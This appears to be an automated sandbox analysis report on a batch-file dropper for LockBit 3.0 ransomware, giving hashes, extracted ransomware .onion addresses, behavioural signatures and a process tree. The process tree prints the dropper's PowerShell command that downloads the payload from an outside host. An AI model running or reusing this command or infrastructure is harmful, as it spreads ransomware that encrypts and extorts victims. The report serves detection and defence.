Analysis
-
max time kernel
149s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04-09-2024 12:18
Static task
static1
Behavioral task
behavioral1
Sample
Dropper.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Dropper.bat
Resource
win10v2004-20240802-en
General
-
Target
Dropper.bat
-
Size
470B
-
MD5
8073ff57f855d5cd51346f011933d9fb
-
SHA1
d24fc282fb660945b87e1c41860a031f6e7ec9f6
-
SHA256
6bce98ce8751d6f87e97578a05e606a0b699f24c1a69b96cd28ef88d4984fe71
-
SHA512
9f2e04c4f8bdeab0e2075b5bc42edbe6a9ee4221fbf1ebbacd44238576e77f7b2d5f5d3ac90d433b8b6f5493fef51747405e14a5aa2cf59a4663b2cf385b4610
Malware Config
Extracted
https://master-repogen.vercel.app/file/server.scr
Extracted
C:\wlJ8FiR2h.README.txt
lockbit
http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
http://lockbitsupp.uz
http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion
http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion
Signatures
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
Processes:
resource yara_rule behavioral2/files/0x000b0000000234c4-18.dat family_lockbit -
Renames multiple (634) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 4 4328 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
F936.tmpdescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation F936.tmp -
Executes dropped EXE 2 IoCs
Processes:
server.scrF936.tmppid Process 1668 server.scr 3180 F936.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 2 IoCs
Processes:
server.scrdescription ioc Process File opened for modification C:\$Recycle.Bin\S-1-5-21-945322488-2060912225-3527527000-1000\desktop.ini server.scr File opened for modification F:\$RECYCLE.BIN\S-1-5-21-945322488-2060912225-3527527000-1000\desktop.ini server.scr -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 4 IoCs
Processes:
splwow64.exeprintfilterpipelinesvc.exedescription ioc Process File created C:\Windows\system32\spool\PRINTERS\00002.SPL splwow64.exe File created C:\Windows\system32\spool\PRINTERS\PPr6ape5l_j4_vux3dw0uc0kdg.TMP printfilterpipelinesvc.exe File created C:\Windows\system32\spool\PRINTERS\PPmi8cjpx4au992cey_yye4d4bc.TMP printfilterpipelinesvc.exe File created C:\Windows\system32\spool\PRINTERS\PP5zt4z31_gy4158h_f1uy6rzlb.TMP printfilterpipelinesvc.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
server.scrdescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\wlJ8FiR2h.bmp" server.scr Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\wlJ8FiR2h.bmp" server.scr -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
F936.tmppid Process 3180 F936.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
server.scrF936.tmpcmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language F936.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
ONENOTE.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ONENOTE.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
ONENOTE.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ONENOTE.EXE -
Modifies Control Panel 2 IoCs
Processes:
server.scrdescription ioc Process Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop server.scr Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\WallpaperStyle = "10" server.scr -
Modifies registry class 5 IoCs
Processes:
server.scrdescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wlJ8FiR2h server.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wlJ8FiR2h\ = "wlJ8FiR2h" server.scr Key created \REGISTRY\MACHINE\SOFTWARE\Classes\wlJ8FiR2h\DefaultIcon server.scr Key created \REGISTRY\MACHINE\SOFTWARE\Classes\wlJ8FiR2h server.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\wlJ8FiR2h\DefaultIcon\ = "C:\\ProgramData\\wlJ8FiR2h.ico" server.scr -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeserver.scrpid Process 4328 powershell.exe 4328 powershell.exe 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr 1668 server.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeserver.scrdescription pid Process Token: SeDebugPrivilege 4328 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeDebugPrivilege 1668 server.scr Token: 36 1668 server.scr Token: SeImpersonatePrivilege 1668 server.scr Token: SeIncBasePriorityPrivilege 1668 server.scr Token: SeIncreaseQuotaPrivilege 1668 server.scr Token: 33 1668 server.scr Token: SeManageVolumePrivilege 1668 server.scr Token: SeProfSingleProcessPrivilege 1668 server.scr Token: SeRestorePrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSystemProfilePrivilege 1668 server.scr Token: SeTakeOwnershipPrivilege 1668 server.scr Token: SeShutdownPrivilege 1668 server.scr Token: SeDebugPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeBackupPrivilege 1668 server.scr Token: SeSecurityPrivilege 1668 server.scr -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
ONENOTE.EXEpid Process 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE 1988 ONENOTE.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
cmd.exeserver.scrprintfilterpipelinesvc.exeF936.tmpdescription pid Process procid_target PID 1896 wrote to memory of 4328 1896 cmd.exe 84 PID 1896 wrote to memory of 4328 1896 cmd.exe 84 PID 1896 wrote to memory of 1668 1896 cmd.exe 88 PID 1896 wrote to memory of 1668 1896 cmd.exe 88 PID 1896 wrote to memory of 1668 1896 cmd.exe 88 PID 1668 wrote to memory of 3956 1668 server.scr 95 PID 1668 wrote to memory of 3956 1668 server.scr 95 PID 4832 wrote to memory of 1988 4832 printfilterpipelinesvc.exe 100 PID 4832 wrote to memory of 1988 4832 printfilterpipelinesvc.exe 100 PID 1668 wrote to memory of 3180 1668 server.scr 101 PID 1668 wrote to memory of 3180 1668 server.scr 101 PID 1668 wrote to memory of 3180 1668 server.scr 101 PID 1668 wrote to memory of 3180 1668 server.scr 101 PID 3180 wrote to memory of 1840 3180 F936.tmp 102 PID 3180 wrote to memory of 1840 3180 F936.tmp 102 PID 3180 wrote to memory of 1840 3180 F936.tmp 102
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dropper.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://master-repogen.vercel.app/file/server.scr', 'C:\Users\Admin\Downloads\server.scr')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Users\Admin\Downloads\server.scr"C:\Users\Admin\Downloads\server.scr"2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵
- Drops file in System32 directory
PID:3956
-
-
C:\ProgramData\F936.tmp"C:\ProgramData\F936.tmp"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\F936.tmp >> NUL4⤵
- System Location Discovery: System Language Discovery
PID:1840
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:2868
-
C:\Windows\system32\printfilterpipelinesvc.exeC:\Windows\system32\printfilterpipelinesvc.exe -Embedding1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE/insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{97770A94-0D5C-429F-B4D0-29072EFFBD2C}.xps" 1336992590529800002⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:1988
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD551c5de16c75310ed189825f986188eb8
SHA1b18deb985172a65f51fa3782da3c96eeeec49566
SHA256fd65a2a85e12f1cb5b92df30c02696742a49a42463506bb0d24313ab04237150
SHA5126f249408c7d7b420a9c581db775cbbac4992d3cc57073630efd3cd7076cf16418ff878bfa7fbf9d46bfb12eeccc77b08229491e9323fb8265f1c091f34c500e7
-
Filesize
14KB
MD5294e9f64cb1642dd89229fff0592856b
SHA197b148c27f3da29ba7b18d6aee8a0db9102f47c9
SHA256917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2
SHA512b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
150KB
MD50cbf130355c5646c10d5618931ee6170
SHA1f58a71c4c409edc2a8e348b4d3917fcfce0fd8fd
SHA256dad537051050baa7aa7eff6fd89e2908dbd81f566ebe1b2e6ddb2c5c970d8928
SHA512a3a7dd96c012de023c1963bb479193fa0fdeff763928db32be05da42a0bca97779b6ce0de6e8e75496750e643ea84304da7ad38db48da6a25930fc01825db581
-
Filesize
150KB
MD57e503c206e57f0295da017914a957d04
SHA196c375b9c57292db73c7ef2f2df16cf7be1604bb
SHA256274844568a6a9ce334d71efeac21f528d7b54b2cd4377c978cc1270c6ad986c4
SHA512cd4889ae107c54df854042e030eb431664d4db9d6dc908d1f1910ca49b89d247222f9d19440fcc2d9a120c95b56cd694750072ab9486eea961b8c33391344c1c
-
Filesize
3KB
MD5b9674de0868a93e9121bdb1d02d80130
SHA179d692fd03d3110a4358e2cc7442af9517489f3f
SHA2569268d24e96639cf4c0e8d74f9769092b415015692ea528820faaded6fc5b052c
SHA512b3264ad33eddedb2c18da883e2345247c762adc8a604991fce931cba06b86c361d23fa121e79d6c69948a2d5b9c1613139f401b971360d9d684abb5a61543c02
-
Filesize
129B
MD5c23b773e235f0f9c74ca631503577a5b
SHA18b1c4510e31445dd7aa89e516728ea6692c58f55
SHA256d212fea9149b5b108a0d3433c05e6c88b3a9e9f45772f7f323b81ca65fdf43bb
SHA51276bc7f2ec7b2b4bf00a19b867e35a4579cd3529c173bd84c61e6da24dfc2475cd3c4c55525d3714a060c97fb140d320382d57d89912267ae9b112815831f3d4a